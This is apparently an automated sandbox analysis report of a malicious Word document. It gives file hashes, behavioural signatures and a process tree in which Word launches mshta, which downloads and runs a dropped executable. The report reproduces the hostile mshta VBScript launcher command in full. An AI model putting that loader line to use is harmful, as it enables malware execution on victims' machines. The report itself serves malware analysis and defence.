Analysis
-
max time kernel
148s -
max time network
137s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
12-05-2021 14:02
Static task
static1
Behavioral task
behavioral1
Sample
7abe6d89_by_Libranalysis.doc
Resource
win7v20210408
Behavioral task
behavioral2
Sample
7abe6d89_by_Libranalysis.doc
Resource
win10v20210410
General
-
Target
7abe6d89_by_Libranalysis.doc
-
Size
68KB
-
MD5
7abe6d890f58d5a0b421edb2d4eed932
-
SHA1
a9c31dbfd581bcbb7236c828c6cc9dac13dbc6be
-
SHA256
02e62eeb73ac0c0fa55cc203fbee23420a848cf991106eca3f75e8863a0cb4e5
-
SHA512
488a7397cf9644c42a8b5a831f4a0e3a2ad99fc4cb7fe4d617ee8bd4085459f54a34be868c752c57375bba10e6dfa9ac5f7424aa0bb233943c1cb48f5d95bebc
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2272 3680 mshta.exe WINWORD.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 25 2272 mshta.exe 27 2272 mshta.exe 28 2272 mshta.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
task-2225.exepid process 3952 task-2225.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WINWORD.EXEdescription ioc process File opened (read-only) \??\B: WINWORD.EXE File opened (read-only) \??\J: WINWORD.EXE File opened (read-only) \??\K: WINWORD.EXE File opened (read-only) \??\M: WINWORD.EXE File opened (read-only) \??\N: WINWORD.EXE File opened (read-only) \??\X: WINWORD.EXE File opened (read-only) \??\E: WINWORD.EXE File opened (read-only) \??\H: WINWORD.EXE File opened (read-only) \??\I: WINWORD.EXE File opened (read-only) \??\U: WINWORD.EXE File opened (read-only) \??\V: WINWORD.EXE File opened (read-only) \??\W: WINWORD.EXE File opened (read-only) \??\T: WINWORD.EXE File opened (read-only) \??\A: WINWORD.EXE File opened (read-only) \??\F: WINWORD.EXE File opened (read-only) \??\G: WINWORD.EXE File opened (read-only) \??\O: WINWORD.EXE File opened (read-only) \??\Q: WINWORD.EXE File opened (read-only) \??\R: WINWORD.EXE File opened (read-only) \??\S: WINWORD.EXE File opened (read-only) \??\Y: WINWORD.EXE File opened (read-only) \??\L: WINWORD.EXE File opened (read-only) \??\P: WINWORD.EXE File opened (read-only) \??\Z: WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3680 WINWORD.EXE 3680 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
WINWORD.EXEdescription pid process Token: SeShutdownPrivilege 3680 WINWORD.EXE Token: SeCreatePagefilePrivilege 3680 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 3680 WINWORD.EXE 3680 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 18 IoCs
Processes:
WINWORD.EXEpid process 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE 3680 WINWORD.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
WINWORD.EXEmshta.exedescription pid process target process PID 3680 wrote to memory of 1364 3680 WINWORD.EXE splwow64.exe PID 3680 wrote to memory of 1364 3680 WINWORD.EXE splwow64.exe PID 3680 wrote to memory of 2272 3680 WINWORD.EXE mshta.exe PID 3680 wrote to memory of 2272 3680 WINWORD.EXE mshta.exe PID 2272 wrote to memory of 3952 2272 mshta.exe task-2225.exe PID 2272 wrote to memory of 3952 2272 mshta.exe task-2225.exe PID 2272 wrote to memory of 3952 2272 mshta.exe task-2225.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7abe6d89_by_Libranalysis.doc" /o ""1⤵
- Enumerates connected drives
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1364
-
C:\Windows\SYSTEM32\mshta.exemshta.exe "about:<script language=VBScript>moveTo 0,-9999:Execute(CreateObject("Scripting.FileSystemObject").GetStandardStream(0).ReadAll()):sub window_onload:Close:End Sub</script><hta:application showintaskbar=no />"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Users\Admin\AppData\Local\Temp\task-2225.exe"C:\Users\Admin\AppData\Local\Temp\task-2225.exe"3⤵
- Executes dropped EXE
PID:3952
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\task-2225.exeMD5
0733d419a18124833b92af75d65d42a4
SHA12d69faba27d0f57c22642efc3bb4a7388a7270e5
SHA256c9b807b28e1fee284104356f934b030a5739844b910a9441a5b104df6ab24c4c
SHA512d58ebbc8914447a35a1d3340e8c67d5c858010ff4a66a66c3dac654b6f9af7779945561b64ccd8b2d3250404a68cbeffebf4e70904f8e91f893a35435cb49b05
-
C:\Users\Admin\AppData\Local\Temp\task-2225.exeMD5
0733d419a18124833b92af75d65d42a4
SHA12d69faba27d0f57c22642efc3bb4a7388a7270e5
SHA256c9b807b28e1fee284104356f934b030a5739844b910a9441a5b104df6ab24c4c
SHA512d58ebbc8914447a35a1d3340e8c67d5c858010ff4a66a66c3dac654b6f9af7779945561b64ccd8b2d3250404a68cbeffebf4e70904f8e91f893a35435cb49b05
-
memory/1364-179-0x0000000000000000-mapping.dmp
-
memory/2272-180-0x0000000000000000-mapping.dmp
-
memory/3680-118-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/3680-182-0x000002EB6C060000-0x000002EB6C070000-memory.dmpFilesize
64KB
-
memory/3680-122-0x00007FF876250000-0x00007FF87733E000-memory.dmpFilesize
16.9MB
-
memory/3680-123-0x00007FF8736A0000-0x00007FF875595000-memory.dmpFilesize
31.0MB
-
memory/3680-114-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/3680-117-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/3680-181-0x000002EB6C050000-0x000002EB6C060000-memory.dmpFilesize
64KB
-
memory/3680-119-0x00007FF87B2D0000-0x00007FF87DDF3000-memory.dmpFilesize
43.1MB
-
memory/3680-183-0x000002EB6C050000-0x000002EB6C060000-memory.dmpFilesize
64KB
-
memory/3680-184-0x000002EB6C050000-0x000002EB6C060000-memory.dmpFilesize
64KB
-
memory/3680-185-0x000002EB6C050000-0x000002EB6C060000-memory.dmpFilesize
64KB
-
memory/3680-186-0x000002EB6C050000-0x000002EB6C060000-memory.dmpFilesize
64KB
-
memory/3680-115-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/3680-116-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/3952-187-0x0000000000000000-mapping.dmp